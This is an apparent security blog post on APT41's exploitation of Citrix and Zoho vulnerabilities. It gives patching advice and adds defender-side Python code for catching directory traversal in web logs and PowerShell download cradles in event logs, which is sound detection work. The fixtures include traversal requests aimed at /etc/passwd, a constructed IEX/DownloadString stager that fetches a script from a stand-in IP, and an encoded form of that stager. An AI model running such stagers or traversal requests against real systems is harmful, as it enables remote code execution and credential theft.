Analysts at FireEye have identified a massive campaign run by the Chinese-backed APT41 threat group targeting multiple business sectors. This campaign leverages many vulnerabilities in products typically used by businesses in order to gain a foothold on enterprise systems. The exploits used are:
- CVE-2019-19781 – Targets Citrix Application Delivery Controller (ADC) and Gateway. Allows directory traversal, which can be used to access credential files.
- CVE-2020-10189 – Targets Zoho ManageEngine Desktop Central before 10.0.474. Allows remote code execution.
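Directory traversal of the kind described for the Citrix bug above leaves a recognisable trace in web server access logs, but attackers routinely URL-encode or double-encode the `..` segments so that a naive search for `../` misses them. The following is an added example (not code from the Binary Defense post or from FireEye's report) of a defender-side log check that normalizes each request path before testing it; the log lines, IP addresses and paths are constructed for illustration.

```python
"""Flag directory-traversal attempts in web-server access logs.

Added example: normalizes request paths (strip query string, repeated
percent-decoding, backslash folding) and reports any request whose path
contains a '..' segment after normalization. Sample lines are constructed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in common log format (IPs, paths and UAs are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2020:08:01:12 +0000] "GET /portal/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2020:08:02:40 +0000] "GET /portal/../etc/passwd HTTP/1.1" 403 0 "-" "curl/7.64.0"
198.51.100.7 - - [10/Mar/2020:08:03:01 +0000] "GET /portal/%2e%2e/%2e%2e/secret.conf HTTP/1.1" 404 0 "-" "python-requests/2.22"
198.51.100.7 - - [10/Mar/2020:08:03:05 +0000] "POST /portal/%252e%252e/config HTTP/1.1" 404 0 "-" "python-requests/2.22"
192.0.2.44 - - [10/Mar/2020:08:04:22 +0000] "GET /static/app.js HTTP/1.1" 200 84211 "-" "Mozilla/5.0"
"""

# Minimal common-log-format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(raw_path: str, max_rounds: int = 3) -> str:
    """Strip the query string and percent-decode until the result is stable.

    Repeated decoding catches double-encoded sequences such as %252e%252e,
    which decode to %2e%2e and only then to '..'.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Fold backslashes into slashes so "..\" is not missed on Windows-style paths.
    return path.replace("\\", "/")


def is_traversal(raw_path: str) -> bool:
    """True if any path segment is '..' after normalization."""
    return ".." in normalize_path(raw_path).split("/")


def find_traversal_attempts(log_text: str) -> List[Dict]:
    """Return one record per log line whose request path climbs out of the web root."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines rather than abort the whole triage
        if is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "normalized": normalize_path(m["path"]),
                "status": int(m["status"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["path"]} -> {hit["normalized"]}')
```

Note that the check keys on the normalized path, not on the response status: a 403 or 404 still records an attempt, and a run of such attempts from one source against a gateway appliance is worth an analyst's attention regardless of whether any of them succeeded.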
The group moved incredibly quickly after the vulnerabilities were announced to develop and operationalize exploits against the businesses targeted by these campaigns. CVE-2019-19781 was released a month before the campaigns began, and the remote code execution proof of concept (PoC) for CVE-2020-10189 was released three days before APT41 began using it.
After gaining access to a system, APT41 was seen deploying either a Meterpreter downloader or a Cobalt Strike Beacon, both of which communicated with the same command-and-control servers.
The best method for protecting against these attacks is to prevent them from occurring by either patching affected systems or mitigating the known vulnerabilities.
For organizations that cannot patch CVE-2019-19781, Citrix provides mitigation in the form of several system configuration changes that can be performed. More info can be found here: https://support.citrix.com/article/CTX267679.
Zoho also provides manual vulnerability mitigation steps on their support page (https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html); however, they recommend patching systems before attempting manual vulnerability removal.
To detect APT41 activity or other attacker behaviors, Binary Defense recommends the use of PowerShell script block logging, Sysmon logging (with appropriate configuration), and Endpoint Detection and Response (EDR) tools. These help security analysts detect and mitigate an ongoing infection as APT41 begins profiling a network. Making use of the information gathered by additional logging and EDR tools requires security analysts who understand attacker techniques and are skilled at interpreting activity on workstations and servers. Since attacks from around the world can happen at any time of day, a Security Operations Center (SOC) should be ready to respond to attacks around the clock. Binary Defense provides expert monitoring of Security Information and Event Management (SIEM) systems and Managed EDR to defend clients’ data, brand and people against attacks 24 hours a day, every day.
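The logging sources recommended above only pay off when someone actually queries them. The following is an added example (not code from the Binary Defense post) of the kind of first-pass triage an analyst runs over PowerShell script block events (Event ID 4104, field `ScriptBlockText`) and Sysmon process-creation events (Event ID 1, field `CommandLine`): it looks for download-cradle indicators, decodes any `-EncodedCommand` blob (base64 of UTF-16LE) so the indicators inside it are visible, and only raises a finding when more than one indicator family is present, which keeps a lone `Invoke-WebRequest` from paging the SOC. The events are constructed and simplified to plain dicts; real events arrive as XML/EVTX and would be parsed first.

```python
"""Triage PowerShell 4104 and Sysmon Event 1 records for stager indicators.

Added example. Events are constructed dicts carrying only the fields used here;
the host name, record ids and command lines are made up for illustration.
"""
import base64
import re
from typing import Dict, List

# Indicator families commonly seen in PowerShell stagers: remote download,
# in-memory execution, and inline base64 decoding.
CRADLE_PATTERNS = [
    re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    re.compile(r"FromBase64String", re.I),
]
# Matches the abbreviated and full spellings of -EncodedCommand and captures the blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed stager text and its -EncodedCommand form (UTF-16LE, then base64).
STAGER_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.txt')"
ENCODED_BLOB = base64.b64encode(STAGER_TEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS: List[Dict] = [
    {"RecordId": 1, "EventID": 4104, "Computer": "WS-01",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"RecordId": 2, "EventID": 4104, "Computer": "WS-01",
     "ScriptBlockText": STAGER_TEXT},
    {"RecordId": 3, "EventID": 1, "Computer": "SRV-02",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"RecordId": 4, "EventID": 1, "Computer": "SRV-02",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_BLOB}"},
    {"RecordId": 5, "EventID": 4104, "Computer": "WS-03",
     "ScriptBlockText": "Invoke-WebRequest https://example.com/file.zip -OutFile file.zip"},
]


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if none is present or it is malformed."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # malformed blob: still suspicious, but do not crash the triage


def cradle_score(text: str) -> int:
    """Number of distinct indicator families present in text."""
    return sum(1 for pattern in CRADLE_PATTERNS if pattern.search(text))


def triage(events: List[Dict]) -> List[Dict]:
    """Return findings for events that look like a stager rather than routine admin activity."""
    findings = []
    for ev in events:
        decoded = ""
        if ev["EventID"] == 4104:
            text = ev["ScriptBlockText"]
        elif ev["EventID"] == 1:
            decoded = decode_encoded_command(ev["CommandLine"])
            text = ev["CommandLine"] + " " + decoded
        else:
            continue
        score = cradle_score(text)
        # Two families together is a strong signal; one family hidden inside an
        # encoded command is enough on its own, since encoding is itself evasive.
        if score >= 2 or (decoded and score >= 1):
            findings.append({
                "RecordId": ev["RecordId"],
                "EventID": ev["EventID"],
                "Computer": ev["Computer"],
                "score": score,
                "decoded": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f'{f["Computer"]} record {f["RecordId"]} (event {f["EventID"]}) score={f["score"]}')
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The same structure extends naturally to Sysmon network-connection (Event ID 3) records, where the destination of the decoded download URL can be matched against the command-and-control infrastructure an EDR or threat-intelligence feed reports.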